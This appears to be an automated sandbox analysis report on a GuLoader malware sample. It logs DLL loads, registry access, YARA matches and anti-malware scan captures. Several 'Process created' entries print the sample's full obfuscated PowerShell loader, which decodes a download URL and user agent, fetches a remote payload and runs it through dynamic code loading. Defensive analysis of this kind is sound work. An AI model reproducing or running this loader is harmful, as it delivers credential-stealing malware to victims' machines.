Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wintypes.dll	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles

Jump to behavior

Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2122178024.0000000008500000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000004.00000002.2116646966.0000000007667000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 00000004.00000002.2116646966.0000000007706000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000004.00000002.2116646966.00000000076E2000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

VBScript performs obfuscated calls to suspicious functions

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: .Run("POWERSHELL "$Tarboosh = 1;$Ldreforvaltningen='Substrin';$Ldreforvaltningen+='g';Function Selvstarterens($Journal)", "0")

Yara detected GuLoader

Source: Yara match	File source: 00000004.00000002.2125155356.000000000A967000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2123886427.0000000008920000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2112300960.0000000005ED0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2313093176.000001D96966F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String($Seashells1)$global:Cornett147 = [System.Text.Encoding]::ASCII.GetString($Procline)$global:Patellula=$Cornett147.substring(305164,29054)<#Blotless Lensstyres objet Spermatozoal #>$Foo
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((Streptaster $Nanocephalus $kalkuleres), (Superassuming @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Plantings = [AppDomain]::CurrentDomain.GetAssemblies
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Bispernes57)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Dvrgpilens, $false).DefineType($Endoproct, $T
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String($Seashells1)$global:Cornett147 = [System.Text.Encoding]::ASCII.GetString($Procline)$global:Patellula=$Cornett147.substring(305164,29054)<#Blotless Lensstyres objet Spermatozoal #>$Foo

Suspicious powershell command line found

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Tarboosh = 1;$Ldreforvaltningen='Substrin';$Ldreforvaltningen+='g';Function Selvstarterens($Journal){$Nomadeinvasionens165=$Journal.Length-$Tarboosh;For($Effectible=5; $Effectible -lt $Nomadeinvasionens165; $Effectible+=(6)){$Lagringsformers+=$Journal.$Ldreforvaltningen.Invoke($Effectible, $Tarboosh);}$Lagringsformers;}function Spelean($Surmaster){. ($Reproduktionsteknikkens) ($Surmaster);}$Uvelkomne=Selvstarterens 'PlummMSkul oPolerz,oliliOvulalbestylvi.uiagen.e/Bat.e5Vandp. ouse0Bas,e Nove(AntipW nyrei A.jenPrv.tdA.auaoAflgnw refosPulve Sty,kNPlyssTDds y Super1 Renl0Overb.Weste0b ned; catu LivreWAcqueiSpeaknMyo,o6ran e4 Sn g;Luthe Kintx rose6Photo4Bef t; odke AlgerrPimpsv Feis: nge1Eryth2South1 Over.Flag 0F,rce)debug AmeriG ,arseRotuncFloppkKokleofysio/kopif2Konom0Tipti1Lag.r0Kalku0Opret1S ksk0 A.cu1Unspr turbFstfroiImpe.rWhor.eMa sifUnid,oLand.xNonf /Doket1Sikke2vrang1 Deci.Mesom0 L,ee ';$Yellowfish=Selvstarterens 'G undUDimmosAflire,onharIncel- FradAD.utog R.coe.orksn,erdetHalen ';$Ellokomotiv242=Selvstarterens 'Falkeh elvetAdmirtSyge.pnyanls Th.n:Tugt / Lepi/A.pasdSbr dr Anchis kkevSupereFo.tm.BreasgRarefo Fonlo Bageg CapslBeforeAlkoh.Granic,ejrsoRecemmplate/ VaskuTeknocR.llo?ItczeeRescuxElevap VulsoUd,karDermatIn si=EpilodCrampoLuksuw BortnT rmilApheloNe gaa dtoed cams&Nonadi GlumdNoi.e=Amill1Skrivx QuinC .nsvK Kv.kkBro.hDSlovaLG nerKPupilk thuriBoatlJmortagHydroTkr,ptCsla p2FipskNV ndu2Aands8HellehdruesjCatholSlagt0U tral ask1det,c9IntruULiderbAquavuStenbxSl.ndJShove6 Avisw Subc9Overt ';$intersessional=Selvstarterens ' Stal>Tidsd ';$Reproduktionsteknikkens=Selvstarterens 'BygniiCha me T.okx ,ned ';$Guiding='Scop124';Spelean (Selvstarterens 'VirksSRiddeeJointtStave-Smr.aCFarmeoCastrnRegistFirmaeMilten G.vetProev F,dst- verP JubbaPeriotKrlhahTvrsk ForeaT,econ:Forma\nedb,B BromiColles pre i.hotodSand,dHydraeSt,mmr Ho,neha,mon.sthe.Unurnt ilatxCo tatAlcon Sylve-Fu,daV B.gsaindbelapparuAars eSabi Ammo,$P,atrG NonruSo ediExtradSrgeri RabunB issgSigna;Spe l ');Spelean (Selvstarterens ' .nneiJave,fDeleg Nonn(Frit.t TekseSocrasLuft.tDani,-Bead.pBalm,aQuiritfi.enhOlymp NonnaTAton,:Dechi\ AadsB rakiiPredesHektai PjatdSkrendprecieUund.rVolleeBre snEquip.Egenpt ashlxEnsilt,here) ultr{ TromeGunnaxPe muiGementS,gne}Ethno;Homes ');$Dilamination = Selvstarterens 'Yunp e ButtckonkahTkkesoNeden Komar% amma .alvpErratpIndhadKolleaMesmetAarboaParap%Konsu\CantoAObfuspBauxit rsenyTod,icConnuhJde vu,heolsfuran.Tabe.WPolsthEmbleiMorbi Trvej& K.nt& Pro, AlgareGashacImpu,hBreako Gte. Coryb$Ciliu ';Spelean (Selvstarterens 'Reabs$ Codeg JdinlRegrao Twi,bfdselaUnco.l Utru:Ob,lsfUnparoEnkelrAfslreOpfunc Sulfo PariuFilm,nR.licsUranoesandol,nder=ingvo(Staa.c QuadmGeo.hdAft n Pi.ds/AnkomcRader Brunl$ ModiD orsi JarglN.outaBa ekmKendei BensnGastra DdsdtSlingi Ast.oDushsnRedhe).ikke ');Spelean (Selvstarterens ' Konk$OncotgTiltalforudoModsvbHavega
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Tarboosh = 1;$Ldreforvaltningen='Substrin';$Ldreforvaltningen+='g';Function Selvstarterens($Journal){$Nomadeinvasionens165=$Journal.Length-$Tarboosh;For($Effectible=5; $Effectible -lt $Nomadeinvasionens165; $Effectible+=(6)){$Lagringsformers+=$Journal.$Ldreforvaltningen.Invoke($Effectible, $Tarboosh);}$Lagringsformers;}function Spelean($Surmaster){. ($Reproduktionsteknikkens) ($Surmaster);}$Uvelkomne=Selvstarterens 'PlummMSkul oPolerz,oliliOvulalbestylvi.uiagen.e/Bat.e5Vandp. ouse0Bas,e Nove(AntipW nyrei A.jenPrv.tdA.auaoAflgnw refosPulve Sty,kNPlyssTDds y Super1 Renl0Overb.Weste0b ned; catu LivreWAcqueiSpeaknMyo,o6ran e4 Sn g;Luthe Kintx rose6Photo4Bef t; odke AlgerrPimpsv Feis: nge1Eryth2South1 Over.Flag 0F,rce)debug AmeriG ,arseRotuncFloppkKokleofysio/kopif2Konom0Tipti1Lag.r0Kalku0Opret1S ksk0 A.cu1Unspr turbFstfroiImpe.rWhor.eMa sifUnid,oLand.xNonf /Doket1Sikke2vrang1 Deci.Mesom0 L,ee ';$Yellowfish=Selvstarterens 'G undUDimmosAflire,onharIncel- FradAD.utog R.coe.orksn,erdetHalen ';$Ellokomotiv242=Selvstarterens 'Falkeh elvetAdmirtSyge.pnyanls Th.n:Tugt / Lepi/A.pasdSbr dr Anchis kkevSupereFo.tm.BreasgRarefo Fonlo Bageg CapslBeforeAlkoh.Granic,ejrsoRecemmplate/ VaskuTeknocR.llo?ItczeeRescuxElevap VulsoUd,karDermatIn si=EpilodCrampoLuksuw BortnT rmilApheloNe gaa dtoed cams&Nonadi GlumdNoi.e=Amill1Skrivx QuinC .nsvK Kv.kkBro.hDSlovaLG nerKPupilk thuriBoatlJmortagHydroTkr,ptCsla p2FipskNV ndu2Aands8HellehdruesjCatholSlagt0U tral ask1det,c9IntruULiderbAquavuStenbxSl.ndJShove6 Avisw Subc9Overt ';$intersessional=Selvstarterens ' Stal>Tidsd ';$Reproduktionsteknikkens=Selvstarterens 'BygniiCha me T.okx ,ned ';$Guiding='Scop124';Spelean (Selvstarterens 'VirksSRiddeeJointtStave-Smr.aCFarmeoCastrnRegistFirmaeMilten G.vetProev F,dst- verP JubbaPeriotKrlhahTvrsk ForeaT,econ:Forma\nedb,B BromiColles pre i.hotodSand,dHydraeSt,mmr Ho,neha,mon.sthe.Unurnt ilatxCo tatAlcon Sylve-Fu,daV B.gsaindbelapparuAars eSabi Ammo,$P,atrG NonruSo ediExtradSrgeri RabunB issgSigna;Spe l ');Spelean (Selvstarterens ' .nneiJave,fDeleg Nonn(Frit.t TekseSocrasLuft.tDani,-Bead.pBalm,aQuiritfi.enhOlymp NonnaTAton,:Dechi\ AadsB rakiiPredesHektai PjatdSkrendprecieUund.rVolleeBre snEquip.Egenpt ashlxEnsilt,here) ultr{ TromeGunnaxPe muiGementS,gne}Ethno;Homes ');$Dilamination = Selvstarterens 'Yunp e ButtckonkahTkkesoNeden Komar% amma .alvpErratpIndhadKolleaMesmetAarboaParap%Konsu\CantoAObfuspBauxit rsenyTod,icConnuhJde vu,heolsfuran.Tabe.WPolsthEmbleiMorbi Trvej& K.nt& Pro, AlgareGashacImpu,hBreako Gte. Coryb$Ciliu ';Spelean (Selvstarterens 'Reabs$ Codeg JdinlRegrao Twi,bfdselaUnco.l Utru:Ob,lsfUnparoEnkelrAfslreOpfunc Sulfo PariuFilm,nR.licsUranoesandol,nder=ingvo(Staa.c QuadmGeo.hdAft n Pi.ds/AnkomcRader Brunl$ ModiD orsi JarglN.outaBa ekmKendei BensnGastra DdsdtSlingi Ast.oDushsnRedhe).ikke ');Spelean (Selvstarterens ' Konk$OncotgTiltalforudoModsvbHavega
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Tarboosh = 1;$Ldreforvaltningen='Substrin';$Ldreforvaltningen+='g';Function Selvstarterens($Journal){$Nomadeinvasionens165=$Journal.Length-$Tarboosh;For($Effectible=5; $Effectible -lt $Nomadeinvasionens165; $Effectible+=(6)){$Lagringsformers+=$Journal.$Ldreforvaltningen.Invoke($Effectible, $Tarboosh);}$Lagringsformers;}function Spelean($Surmaster){. ($Reproduktionsteknikkens) ($Surmaster);}$Uvelkomne=Selvstarterens 'PlummMSkul oPolerz,oliliOvulalbestylvi.uiagen.e/Bat.e5Vandp. ouse0Bas,e Nove(AntipW nyrei A.jenPrv.tdA.auaoAflgnw refosPulve Sty,kNPlyssTDds y Super1 Renl0Overb.Weste0b ned; catu LivreWAcqueiSpeaknMyo,o6ran e4 Sn g;Luthe Kintx rose6Photo4Bef t; odke AlgerrPimpsv Feis: nge1Eryth2South1 Over.Flag 0F,rce)debug AmeriG ,arseRotuncFloppkKokleofysio/kopif2Konom0Tipti1Lag.r0Kalku0Opret1S ksk0 A.cu1Unspr turbFstfroiImpe.rWhor.eMa sifUnid,oLand.xNonf /Doket1Sikke2vrang1 Deci.Mesom0 L,ee ';$Yellowfish=Selvstarterens 'G undUDimmosAflire,onharIncel- FradAD.utog R.coe.orksn,erdetHalen ';$Ellokomotiv242=Selvstarterens 'Falkeh elvetAdmirtSyge.pnyanls Th.n:Tugt / Lepi/A.pasdSbr dr Anchis kkevSupereFo.tm.BreasgRarefo Fonlo Bageg CapslBeforeAlkoh.Granic,ejrsoRecemmplate/ VaskuTeknocR.llo?ItczeeRescuxElevap VulsoUd,karDermatIn si=EpilodCrampoLuksuw BortnT rmilApheloNe gaa dtoed cams&Nonadi GlumdNoi.e=Amill1Skrivx QuinC .nsvK Kv.kkBro.hDSlovaLG nerKPupilk thuriBoatlJmortagHydroTkr,ptCsla p2FipskNV ndu2Aands8HellehdruesjCatholSlagt0U tral ask1det,c9IntruULiderbAquavuStenbxSl.ndJShove6 Avisw Subc9Overt ';$intersessional=Selvstarterens ' Stal>Tidsd ';$Reproduktionsteknikkens=Selvstarterens 'BygniiCha me T.okx ,ned ';$Guiding='Scop124';Spelean (Selvstarterens 'VirksSRiddeeJointtStave-Smr.aCFarmeoCastrnRegistFirmaeMilten G.vetProev F,dst- verP JubbaPeriotKrlhahTvrsk ForeaT,econ:Forma\nedb,B BromiColles pre i.hotodSand,dHydraeSt,mmr Ho,neha,mon.sthe.Unurnt ilatxCo tatAlcon Sylve-Fu,daV B.gsaindbelapparuAars eSabi Ammo,$P,atrG NonruSo ediExtradSrgeri RabunB issgSigna;Spe l ');Spelean (Selvstarterens ' .nneiJave,fDeleg Nonn(Frit.t TekseSocrasLuft.tDani,-Bead.pBalm,aQuiritfi.enhOlymp NonnaTAton,:Dechi\ AadsB rakiiPredesHektai PjatdSkrendprecieUund.rVolleeBre snEquip.Egenpt ashlxEnsilt,here) ultr{ TromeGunnaxPe muiGementS,gne}Ethno;Homes ');$Dilamination = Selvstarterens 'Yunp e ButtckonkahTkkesoNeden Komar% amma .alvpErratpIndhadKolleaMesmetAarboaParap%Konsu\CantoAObfuspBauxit rsenyTod,icConnuhJde vu,heolsfuran.Tabe.WPolsthEmbleiMorbi Trvej& K.nt& Pro, AlgareGashacImpu,hBreako Gte. Coryb$Ciliu ';Spelean (Selvstarterens 'Reabs$ Codeg JdinlRegrao Twi,bfdselaUnco.l Utru:Ob,lsfUnparoEnkelrAfslreOpfunc Sulfo PariuFilm,nR.licsUranoesandol,nder=ingvo(Staa.c QuadmGeo.hdAft n Pi.ds/AnkomcRader Brunl$ ModiD orsi JarglN.outaBa ekmKendei BensnGastra DdsdtSlingi Ast.oDushsnRedhe).ikke ');Spelean (Selvstarterens ' Konk$OncotgTiltalforudoModsvbHavega	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Tarboosh = 1;$Ldreforvaltningen='Substrin';$Ldreforvaltningen+='g';Function Selvstarterens($Journal){$Nomadeinvasionens165=$Journal.Length-$Tarboosh;For($Effectible=5; $Effectible -lt $Nomadeinvasionens165; $Effectible+=(6)){$Lagringsformers+=$Journal.$Ldreforvaltningen.Invoke($Effectible, $Tarboosh);}$Lagringsformers;}function Spelean($Surmaster){. ($Reproduktionsteknikkens) ($Surmaster);}$Uvelkomne=Selvstarterens 'PlummMSkul oPolerz,oliliOvulalbestylvi.uiagen.e/Bat.e5Vandp. ouse0Bas,e Nove(AntipW nyrei A.jenPrv.tdA.auaoAflgnw refosPulve Sty,kNPlyssTDds y Super1 Renl0Overb.Weste0b ned; catu LivreWAcqueiSpeaknMyo,o6ran e4 Sn g;Luthe Kintx rose6Photo4Bef t; odke AlgerrPimpsv Feis: nge1Eryth2South1 Over.Flag 0F,rce)debug AmeriG ,arseRotuncFloppkKokleofysio/kopif2Konom0Tipti1Lag.r0Kalku0Opret1S ksk0 A.cu1Unspr turbFstfroiImpe.rWhor.eMa sifUnid,oLand.xNonf /Doket1Sikke2vrang1 Deci.Mesom0 L,ee ';$Yellowfish=Selvstarterens 'G undUDimmosAflire,onharIncel- FradAD.utog R.coe.orksn,erdetHalen ';$Ellokomotiv242=Selvstarterens 'Falkeh elvetAdmirtSyge.pnyanls Th.n:Tugt / Lepi/A.pasdSbr dr Anchis kkevSupereFo.tm.BreasgRarefo Fonlo Bageg CapslBeforeAlkoh.Granic,ejrsoRecemmplate/ VaskuTeknocR.llo?ItczeeRescuxElevap VulsoUd,karDermatIn si=EpilodCrampoLuksuw BortnT rmilApheloNe gaa dtoed cams&Nonadi GlumdNoi.e=Amill1Skrivx QuinC .nsvK Kv.kkBro.hDSlovaLG nerKPupilk thuriBoatlJmortagHydroTkr,ptCsla p2FipskNV ndu2Aands8HellehdruesjCatholSlagt0U tral ask1det,c9IntruULiderbAquavuStenbxSl.ndJShove6 Avisw Subc9Overt ';$intersessional=Selvstarterens ' Stal>Tidsd ';$Reproduktionsteknikkens=Selvstarterens 'BygniiCha me T.okx ,ned ';$Guiding='Scop124';Spelean (Selvstarterens 'VirksSRiddeeJointtStave-Smr.aCFarmeoCastrnRegistFirmaeMilten G.vetProev F,dst- verP JubbaPeriotKrlhahTvrsk ForeaT,econ:Forma\nedb,B BromiColles pre i.hotodSand,dHydraeSt,mmr Ho,neha,mon.sthe.Unurnt ilatxCo tatAlcon Sylve-Fu,daV B.gsaindbelapparuAars eSabi Ammo,$P,atrG NonruSo ediExtradSrgeri RabunB issgSigna;Spe l ');Spelean (Selvstarterens ' .nneiJave,fDeleg Nonn(Frit.t TekseSocrasLuft.tDani,-Bead.pBalm,aQuiritfi.enhOlymp NonnaTAton,:Dechi\ AadsB rakiiPredesHektai PjatdSkrendprecieUund.rVolleeBre snEquip.Egenpt ashlxEnsilt,here) ultr{ TromeGunnaxPe muiGementS,gne}Ethno;Homes ');$Dilamination = Selvstarterens 'Yunp e ButtckonkahTkkesoNeden Komar% amma .alvpErratpIndhadKolleaMesmetAarboaParap%Konsu\CantoAObfuspBauxit rsenyTod,icConnuhJde vu,heolsfuran.Tabe.WPolsthEmbleiMorbi Trvej& K.nt& Pro, AlgareGashacImpu,hBreako Gte. Coryb$Ciliu ';Spelean (Selvstarterens 'Reabs$ Codeg JdinlRegrao Twi,bfdselaUnco.l Utru:Ob,lsfUnparoEnkelrAfslreOpfunc Sulfo PariuFilm,nR.licsUranoesandol,nder=ingvo(Staa.c QuadmGeo.hdAft n Pi.ds/AnkomcRader Brunl$ ModiD orsi JarglN.outaBa ekmKendei BensnGastra DdsdtSlingi Ast.oDushsnRedhe).ikke ');Spelean (Selvstarterens ' Konk$OncotgTiltalforudoModsvbHavega	Jump to behavior

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_00007FFD9B8A09AD push E85E515Dh; ret	1_2_00007FFD9B8A09F9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_00007FFD9B9771C8 push esp; retf	1_2_00007FFD9B9771C9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_078D08C2 push eax; mov dword ptr [esp], ecx	4_2_078D0AC4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_078DB144 push 8B6B39BFh; iretd	4_2_078DB149
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_078D0AB8 push eax; mov dword ptr [esp], ecx	4_2_078D0AC4

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
